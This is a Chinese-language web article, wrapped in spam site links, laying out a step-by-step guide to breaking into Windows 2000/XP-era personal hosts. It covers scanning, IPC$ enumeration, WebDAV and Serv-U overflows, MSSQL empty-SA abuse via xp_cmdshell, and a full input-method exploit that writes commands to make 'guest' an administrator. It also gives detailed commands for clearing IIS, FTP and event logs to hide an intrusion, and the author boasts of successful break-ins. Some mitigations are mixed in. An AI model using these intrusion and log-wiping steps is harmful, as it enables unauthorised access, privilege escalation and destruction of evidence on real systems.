豆豆小说阅读网,大主宰天蚕土豆小说,盛世嫡妃凤轻小说

入侵個人主機網絡的步驟

第一步：隱藏自已的位置
　　為了不在目的主機上留下自己的IP地址，防止被目的主機發現，老練的攻擊者都會盡量通過“跳板”或“肉雞”展開攻擊。所謂“肉雞”通常是指，HACK實現通過后門程序控制的傀儡主機，通過“肉雞”開展的掃描及攻擊，即便被發現也由于現場遺留環境的IP地址是 “肉雞”的地址而很難追查。
　　第二步：尋找目標主機并分析目標主機
　　攻擊者首先要尋找目標主機并分析目標主機。在Internet上能真正標識主機的是IP地址，域名是為了便于記憶主機的IP地址而另起的名字，只要利用域名和IP地址就可以順利地找到目標主機。當然，知道了要攻擊目標的位置還是遠遠不夠的，還必須將主機的操作系統類型及其所提供服務等資料作個全面的了解。此時，攻擊者們會使用一些掃描器工具，以試圖獲取目標主機運行的是哪種操作系統的哪個版本，系統有哪些帳戶，開啟了哪些服務，以及服務程序的版本等資料，為入侵作好充分的準備。
　　第三步：獲取帳號和密碼，登錄主機
　　攻擊者要想入侵一臺主機，首先要有該主機的一個帳號和密碼，否則連登錄都無法進行。這樣常迫使他們先設法盜竊帳戶文件，進行破解，從中獲取某用戶的帳戶和口令，再尋覓合適時機以此身份進入主機。當然，利用某些工具或系統漏洞登錄主機也是攻擊者常用的一種技法。
　　第四步：獲得控制權
　　攻擊者們利用各種工具或系統漏洞進入目標主機系統獲得控制權之后，就會做兩件事：清除記錄和留下后門。他會更改某些系統設置、在系統中置入特洛伊木馬或其他一些遠程操縱程序，以便日后可以不被覺察地再次進入系統。此外，為了避免目標主機發現，清除日志、刪除拷貝的文件等手段來隱藏自己的蹤跡之后，攻擊者就開始下一步的行動。
　　第五步：竊取網絡資源和特權
　　攻擊者找到攻擊目標后，會繼續下一步的攻擊。如：下載敏感信息；竊取帳號密碼、個人資料等。
　　三、網絡攻擊的原理和手法
　　1、從掃描開始
　　掃描往往是攻擊的前奏，通過掃描，搜集目標主機的相關信息，以期尋找目標主機的漏洞。常見的掃描工具有X-scan、superscan、流光、X-port等。
　　在這些工具中，國產的X-scan與流光可算的上是兩個“利器”，這兩個工具不但具有相當快的掃描速度和精確度（個人感覺X-scan在掃描速度上可能更快一點），同時還是發起攻擊的第一手選擇，當然在攻擊方面，流光更為強悍些。
　　除了常見個WWW（80）、FTP（21）、TELNET（23）等，查查十大高風險事件，我們就知道，攻擊者通常還對下列端口很感興趣：
　　135：MS RPC，可以產生針對Windows 2000/XP RPC服務遠程拒絕服務攻擊，以及RPC溢出漏洞，著名的“沖擊波”“震蕩波”就是利用DCOM RPC感染設備；
　　137~139：NetBIOS，WINDOWS系統通過這個端口提供文件和打印共享；
　　445：Microsoft-ds，非常重要的端口，LSASS漏洞、RPC定位漏洞都在這里出現；
　　1433：Microsoft SQL，后面會提到，SQL SERVER默認安裝時留下的空口令SA用戶可以讓攻擊者為所欲為；
　　5632：PCANYWERE，一種遠程終端控制軟件；
　　3389：WINDOWS遠程終端服務
　　4899：RADMIN，一種遠程終端控制軟件
　　由此可見，沒有掃描，自然也就沒有攻擊，從安全的角度的來說，個人主機最安全的系統應該算是WINDOWS98，由于WINDOWS98幾乎不開啟任何服務，自然也沒有任何開放端口，沒有端口，對于這類系統攻擊的可能性就大大降低。當然，XP在打了SP2的補丁后，等于有了一個基于狀態的個人防火墻，相對安全性也提高了很多。
　　2、攻擊開始
　　掃描到有開放的端口，下一步自然是針對相關端口發起攻擊，針對不同端口常見攻擊方式有：
　　139/445：“永恒”的IPC$（未發現此漏洞）
　　說是“永恒”，主要是因為這種漏洞基本已經只能存在于記憶中了。
　　什么是IPC，IPC是共享“命名管道”的資源，主要用于程序間的通訊。在遠程管理計算機和查看計算機的共享資源時使用。什么是“空連接”，利用默認的IPC我們可以與目標主機建立一個空的連接（無需用戶名與密碼），而利用這個空的連接，我們就可以得目標主機上的用戶列表。
　　得到用戶列表有什么用？我們可以利用IPC，訪問共享資源，導出用戶列表，并使用一些字典工具，進行密碼探測。得到了用戶權限后，我們可以利用IPC共享訪問用戶的資源。但所謂的ipc漏洞ipc漏洞，其實并不是真正意義上的漏洞，WINDOWS設計初衷是為了方便管理員的遠程管理而開放的遠程網絡登陸功能，而且還打開了默認共享，即所有的邏輯盤(c，d，e ……)和系統目錄winnt或windows(admin)。所有的這些，初衷都是為了方便管理員的管理，但好的初衷并不一定有好的收效，曾經在一段時間，IPC$已經成為了一種最流行的入侵方式。
　　IPC$需要在NT/2000/XP下運行，通常如果掃描出目標開放了139或445端口，往往是目標開啟 IPC$的前兆，但如果目的主機關閉了IPC $連接共享，你依然無法建立連接，同樣如果管理員設置禁止導出用戶列表，你就算建立IPC$連接也無法看到對方的用戶列表。另外提醒一下，WINXP系統中，已經禁止了遠程用戶的訪問權限，因此，如果對方是XP的操作系統，就別費這個勁了。
　　如何防范ipc$入侵
　　1禁止空連接進行枚舉(此操作并不能阻止空連接的建立,引自《解剖win2000下的空會話》)
　　首先運行regedit，找到如下組建 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為：00000001(如果設置為2的話,有一些問題會發生,比如一些WIN的服務出現問題等等)
　　2禁止默認共享
　　1）察看本地共享資源
　　運行-cmd-輸入net share
　　2）刪除共享(每次輸入一個）
　　net share ipc$ /delete
　　net share admin$ /delete
　　net share c$ /delete
　　net share d$ /delete（如果有e,f,……可以繼續刪除）
　　3）停止server服務
　　net stop server /y （重新啟動后server服務會重新開啟）
　　4）修改注冊表
　　運行-regedit
　　server版:找到如下主鍵 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把 AutoShareServer（DWORD）的鍵值改為:00000000。
　　pro版:找到如下主鍵 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把 AutoShareWks（DWORD）的鍵值改為:00000000。
　　如果上面所說的主鍵不存在，就新建(右擊-新建-雙字節值）一個主健再改鍵值。
　　3永久關閉ipc$和默認共享依賴的服務:lanmanserver即server服務
　　控制面板-管理工具-服務-找到server服務（右擊）-屬性-常規-啟動類型-已禁用
　　4安裝防火墻(選中相關設置)，或者端口過濾(濾掉139,445等)
　　5設置復雜密碼，防止通過ipc$窮舉密碼
　　除了IPC$，我們還可以利用例如SMBCRACK通過暴力猜解管理員口令，如果對方未打補丁，我們還可以利用各種RPC漏洞（就是沖擊波、震蕩波用的那些漏洞），通過各種溢出程序，來得到權限提升（原理和病毒感染的原理是一樣的）。
　　21：Serv-u入侵（未測試使用）
　　Serv-u是常用的FTP SERVER端軟件的一種，因為常用，所以被研究出的漏洞也不少，如果對端開放了21端口，并且采用Seru-U來架站的話，可以查看一下對端的版本。對5. 004及以下系統，可用溢出入侵。（serv5004.exe）對5.1.0.0及以下系統，有一個本地提升權限的漏洞。（servlocal.exe）
　　Serv-U FTP Serve在設置用戶以后會把配置信息存儲與ServUDaemon.ini文件中。包括用戶的權限信息和可訪問目錄信息。本地受限用戶或者是遠程攻擊者只要能夠讀寫Serv-U FTP Serve的文件目錄，就可以通過修改目錄中的ServUDaemon.ini文件實現以Ftp進程在遠程、本地系統上以FTP系統管理員權限來執行任意命令。
　　80：曾經的神話“WEBDAV”（使用情況，成功溢出4臺主機，并登陸其中一臺，其他3臺的 IIS重啟）
　　微軟的IIS功能強大，但遺憾的是同樣漏洞多多，如果IIS不打補丁到SP3的話，那么就有一個著名的WEBDAV漏洞。
　　Webdav漏洞說明：
　　Microsoft Windows 2000 支持“萬維網分布式創作和版本控制 (WebDAV)”協議。RFC 2518 中定義的 WebDAV 是超文本傳輸協議 (HTTP) 的一組擴展，為 Internet 上計算aIIS 服務（默認情況下在 LocalSystem 上下文中運行）的安全上下文中運行。盡管 Microsoft 已為此弱點提供了修補程序并建議客戶立即安裝該修補程序，但還是提供了其他的工具和預防措施，客戶在評估該修補程序的影響和兼容性時可以使用這些工具和措施來阻止此弱點被利用。
　　可以使用掃描器：Webdavscan（是一個專門用于檢測IIS 5.0 服務器是否提供了對WebDAV的支持的掃描器）來查找網絡中存在WEBDAV漏洞的主機，并用溢出程序：wdx.exe來進行攻擊當溢出成功后，就可以使用telnet或者是nc等連接到目標主機的7788端口。
　　如：telnet 127.0.0.1 7788
　　如果正常的話，將出現以下提示：
　　Microsoft Windows 2000 [Version 5.00.2195] (C) 版權所有 1985-2000 Microsoft Corp. C:\WINNT\system32>
　　OK！
　　如何防御：
　　1. 搜索注冊表中的如下鍵：
　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters
　　增加如下注冊表鍵值：
　　value name: DisableWebDAV
　　Data type: DWORD
　　value data: 1
　　2. 使用MS提供的專用補丁！
　　1433：Microsoft SQL的SA空口令（掃描到4臺，成功登陸其中3臺）
　　微軟的MSSQL7.0以下的版本在默認安裝時其SA(System Administrator)口令為空，所開端口為1433，這個漏洞很早了，但直到現在我們依然可以掃描到很多空口令的SA。更為“搞笑” 的是，微軟為了能夠讓SQL管理員管理方便，還設計了一個xp_cmdshell來執行各種相關命令。一個入侵者只需要使用一個MS SQL客戶端與SA口令為空的服務器連接就可以獲得System的權限，并可以在目標主機上執行任意命令。
　　攻擊方式，利用“流光”或其他掃描工具可以掃描、破解SA口令，破解成功后可以使用SQL 客戶端（如SQLEXEC）連接，并獲得系統權限。
　　解決辦法：
　　更改SA管理用戶口令；
　　刪除XP_CMDSHELL命令。（但并不保險，因為如果擁有SA權限，還是可能恢復該命令的）
　　3389：3389輸入法漏洞（不太可能存在了，但可以猜解管理員用戶口令）
　　Microsoft Windows 2000 Server及以上版本在安裝服務器時，其中有一項是超級終端服務，該服務可以使用戶通過圖形界面象管理本地計算機一樣控制遠程計算機（因此成為眾多攻擊者的最愛）。該服務所開放的端口號為3389，是微軟為了方便用戶遠程管理而設。但是中文Windows 2000存在有輸入漏洞，其漏洞就是用戶在登錄Windows 2000時，利用輸入法的幫助文件可以獲得Administrators組權限。
　　1、用終端客戶端程序進行連接；
　　2、按ctrl+shift調出全拼輸入法（其他似乎不行），點鼠標右鍵（如果其幫助菜單發灰，就趕快趕下家吧，人家打補丁了），點幫助，點輸入法入門；
　　3、在\"選項\"菜單上點右鍵--->跳轉到URL\"，輸入：c:\\winnt\\system32\\cmd.exe.（如果不能確定NT系統目錄，則輸入：c:\\ 或d:\\ ……進行查找確定）；
　　4、選擇\"保存到磁盤\" 選擇目錄：c:\\inetpub\\s\\，因實際上是對方服務器上文件自身的復制操作，所以這個過程很快就會完成；
　　5、打開IE，輸入：http://ip/s/cmd.exe?/c dir 怎么樣？有cmd.exe文件了吧？這我們就完成了第一步；
　　6、http://ip/s/cmd.exe?/c echo net user guest /active:yes>go.bat
　　7、http://ip/s/cmd.exe?/c echo net user guest elise>>go.bat
　　8、http://ip/s/cmd.exe?/c echo net localgroup administrators /add
　　guest>>go.bat
　　9、http://ip/s/cmd.exe?/c type go.bat 看看我們的批文件內容是否如下：
　　net user guest /active:yes
　　net user guest elise
　　net localgroup administrators /add guest
　　10、在\"選項\"菜單上點右鍵--->跳轉到URL\"，輸入：c:\\inetpub\\s\\go.bat --->在磁盤當前位置執行；
　　11、OK，.這樣我們就激活了服務器的geust帳戶，密碼為：elise，超級用戶！
　　注意事項：
　　當你用終端客戶端程序登陸到他的服務器時，你的所有操作不會在他的機器上反應出來，但如果他正打開了終端服務管理器，你就慘了了：（這時他能看到你所打開的進程id、程序映象，你的ip及機器名，并能發消息給你！
　　1.在IE下，所擁有的只是iusr_machine權限，因而，你不要設想去做越權的事情，如啟動 telnet、木馬等；
　　2.url的跳轉下，你將擁有超級用戶的權限，好好利用吧 :-）
　　這個漏洞在WIN2000 SP1中已經修改，因此，實際網絡中存在此漏洞的機器幾乎沒有，但是，據說紫光2.3版本、超級五筆的輸入法中又發現此漏洞。
　　解決方法
　　1.打補丁；
　　2.刪掉相關輸入法，用標準就可以；
　　3.服務中關掉：Terminal Services，服務名稱：TermService，對應程序名：system32 [url=file://\\termsrv.exe]\\termsrv.exe[/url]；
　　如果對方已經修改了輸入法漏洞，那么只能通過猜解目標管理員口令的方法來嘗試遠程登陸。
　　5632/4899：PCANYWERE和RADMIN
　　這是兩種遠程控制軟件，使用方式與遠程終端訪問類似，都支持圖形化界面對遠程計算機進行管理，設計的初衷是為了讓管理員能夠更方便的管理設備，但這些軟件，特別是RADMIN，可以設置其在安裝時，不出現任何提示，這種方式使RADMIN更多的被做為一種木馬使用。攻擊者會注意掃描這些端口，因為一旦破解了相應口令就可以象操作本地計算機一樣控制目標。
　　23：猜解ADSL MODEM口令
　　很多時候，掃描只能得到一個23端口，不要沮喪，因為對于個人主機而言，這往往是因為目標主機采用了一個ADSL MODEM上網。一般用戶在使用ADSL MODEM時，往往未加設置，這時，攻擊者往往可以利用ADSL MODEM的默認口令，登陸ADSL，一旦登陸成功，就有可能竊取ADSL 帳戶和口令，并可以查看到內網的IP地址設置，并通過配置NAT映射將內網PC的相關端口映射到公網上，然后對其進行各種破解、攻擊。
　　特洛伊木馬
　　掃描端口、通過各種方法獲得目標主機的用戶權限之后，攻擊者往往利用得到的權限上傳執行一個“木馬”程序，以便能夠更方便的控制目標主機。
　　特洛伊木馬是一種或是直接由一個黑客，或是通過一個不令人起疑的用戶秘密安裝到目標系統的程序。一旦安裝成功并取得管理員權限，安裝此程序的人就可以直接遠程控制目標系統。實際上，對于各種個人主機，在未開放端口和打全補丁后，最有效的攻擊方式還是“木馬 ”程序。攻擊者往往利用捆綁方式將木馬程序與一個普通的EXE文件、JPG或其他正常文件綁定在一起，并利用“社會工程學”的方式，欺騙對方執行程序、查看圖片等。在對方執行程序、打開圖片后，木馬程序就悄無聲息在用戶的PC上執行，并將用戶的一些相關信息通過 EMAIL或其他方式發送給攻擊者，而攻擊者則可以通過木馬程序實施對用戶電腦的控制，比如控制文件、注冊表、鍵盤記錄甚至控制屏幕等。
　　在早期，木馬程序程序隱藏的并不深，通過查看任務管理器就會發現系統內存在不明程序在運行，并且木馬程序還會在用戶主機上監聽特定端口（如冰河的7626），等待攻擊者的連接。典型的早期木馬如BO、BO2000、SUBSERVEN、國產的經典木馬“冰河”等……這種方式的木馬容易被發現，而且被攻擊目標也必須連接在公網上，因為客戶端是無法透過NAT、防火墻連接到內網的用戶的。
　　反彈端口類型木馬，“廣外女生”木馬是國內出現最早反彈端口類型的木馬，這個木馬與傳統的木馬不同，它在執行后會主動連接外網的攻擊者的相關端口，這種方法就避免了傳統木馬無法控制內部用戶的弊端（因為防火墻一般不會對內部發出的數據做控制）。此外，“廣外女生”還會自動殺掉相關殺毒程序的進程。
　　傳統木馬在執行后會作為一個進程，用戶可以通過殺掉進程的方法關閉，而現在的木馬則會將自己注冊一個系統服務，在系統啟動后自動運行。甚至會通過DLL注入，將自己隱藏在系統服務身后。這樣用戶查看進程的時候既看不到可疑進程，也看不到特殊服務……典型代表 “灰鴿子”“武漢男生”。
　　ASP木馬，典型代表“海陽頂端網木馬”。隨著ASP 技術的發展，網絡上基于ASP技術開發的網站越來越多，對ASP技術的支持可以說已經是windows系統IIS服務器的一項基本功能。但是基于ASP技術的木馬后門，也越來越多，而且功能也越來越強大。ASP程序本身是很多網站提供一些互動和數據處理的程序，ASP木馬則是利用ASP語言編制的腳本嵌入在網頁上，當用戶瀏覽這些網頁時會自動執行相關ASP腳本，被木馬感染，這種方式更加簡單和隱蔽，需要注意的是，ASP木馬往往是依靠IE瀏覽器的一些漏洞來執行的，因此給IE打補丁是防范ASP木馬的方法之一（當然并非萬能，還有一些木馬會利用IE的未知漏洞傳播）。
　　清除日志
　　攻擊者在取得用戶權限后，為了避免被發現，就要考慮清除用戶主機的相關日志，因為日志系統往往會記錄攻擊者的相關攻擊過程和信息。
　　Windows2000的日志文件通常有應用程序日志、安全日志、系統日志、DNS服務器日志、FTP 日志、WWW日志等等，可能會根據服務器所開啟的服務不同。
　　一般步驟如下:
　　1.清除IIS的日志。
　　可不要小看IIS的日志功能，它可以詳細的記錄下你的入侵全過程，如你用unicode入侵時ie里打的命令，和對80端口掃描時留下的痕跡。
　　1. 日志的默認位置：%systemroot%\system32\logfiles\w3svc1\，默認每天一個日志。那我們就切換到這個目錄下吧，然后 del *.*。但由于w3svc服務還開著，日志依然還在。
　　方法一: 如有3389可以登錄,那就用notepad打開，按Ctrl+A 然后del吧。
　　方法二: net 命令
　　C:\>net stop w3svc
　　World Wide Web Publishing Service 服務正在停止。(可能會等很長的時間，也可能不成功)
　　World Wide Web Publishing Service 服務已成功停止。
　　選擇先讓w3svc停止，再清除日志，不要忘了再重新打開w3svc服務。
　　C:\>net start w3svc
　　2. 清除ftp日志
　　FTP日志默認位置：%systemroot%\sys tem32\logfiles\msftpsvc1\，默認每天一個日志，清除方法同上。
　　3. 清除Scheduler日志
　　Scheduler服務日志默認位置：%systemroot%\schedlgu.txt。清除方法同上。
　　4. 應用程序日志、安全日志、系統日志、DNS日志默認位置：%systemroot%\sys tem32\config 。清除方法同上。
　　注意以上三個目錄可能不在上面的位置，那是因為管理員做了修改。可以讀取注冊表值得到他們的位置：
　　應用程序日志，安全日志，系統日志，DNS服務器日志，它們這些LOG文件在注冊表中的
　　HKEY_LOCAL_MACHINE\sys tem\CurrentControlSet\Services\Eventlog
　　Schedluler服務日志在注冊表中的
　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
　　5.清除安全日志和系統日志了，守護這些日志的服務是Event Log，試著停掉它！
　　D:\SERVER\system32\LogFiles\W3SVC1>net stop eventlog
　　這項服務無法接受請求的 "暫停" 或 "停止" 操作。沒辦法，它是關鍵服務。如果不用第三方工具，在命令行上根本沒有刪除安全日志和系統日志的可能！打開“控制面板”的“ 管理工具”中的“事件查看器”，在菜單的“操作”項有一個名為“連接到另一臺計算機” 的菜單，點擊它然后輸入遠程計算機的IP，然后選擇遠程計算機的安全性日志，右鍵選擇它的屬性，點擊屬性里的“清除日志”按鈕，同樣的方法去清除系統日志！
　　6.上面大部分重要的日志你都已經清除了。然后要做的就是以防萬一還有遺漏的了。
　　del以下的一些文件：
　　\winnt\*.log
　　system32下
　　\logfiles\*.*
　　\dtclog\*.*
　　\config\*.evt
　　\*.log
　　\*.txt

上一條：面對網站惡意病毒我們該怎么辦？
下一條：USB的封鎖與解除

久草最新视频-久草最新网址-久国产-久国产视频-天天插夜夜操-天天插一插

入侵個人主機網絡的步驟

相關文章